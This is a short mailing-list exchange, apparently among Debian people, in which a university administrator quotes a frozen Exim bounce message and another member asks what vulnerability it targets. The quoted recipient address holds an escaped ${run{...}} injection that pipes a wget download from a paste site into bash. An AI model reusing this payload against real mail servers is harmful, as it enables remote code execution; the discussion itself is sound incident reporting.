Am Dienstag, den 13.10.2020, 08:51 +0200 schrieb Knieling, Christian (IANM):
> To whom this may concern,
>
> I got a system message from my mailer daemon lately. It contains
>
> -------------------------------- cut --------------------------------
> Message 1kS01n-0008Kv-Nb has been frozen (delivery error message).
> The sender is <>.
>
> The following address(es) have yet to be delivered:
>
> ${run{\x2Fbin\x2Fsh\t-c\t\x22wget\t-O\t-
> \thttps\x3A\x2F\x2Fpaste\x2Edebian\x2Enet\x2Fdownloadh\x2Fb8e3188e\t\x7C\tbas
> h\x22}}@ianm-mang.math.kit.edu:
> Too many "Received" headers - suspected mail loop
> -------------------------------- cut --------------------------------
[..]
> I don't know if this messages reaches the right persons, but someone may
> forward it. You may at least remove the files which are accessible on
> paste.debian.net.
Clearly someone tries to run a command put as an address. Out of curiosity:
Which kind of vulnerability are they trying to use here?
Regards, Daniel
--
Regards,
Daniel Leidert <dleidert@debian.org> | https://www.wgdd.de/
GPG-Key RSA4096 / BEED4DED5544A4C03E283DC74BCD0567C296D05D
GPG-Key ED25519 / BD3C132D8B3805D1808123AB7ACE00941E338C78
If you like my work consider sponsoring me via
https://www.patreon.com/join/dleidert
Attachment:
signature.asc
Description: This is a digitally signed message part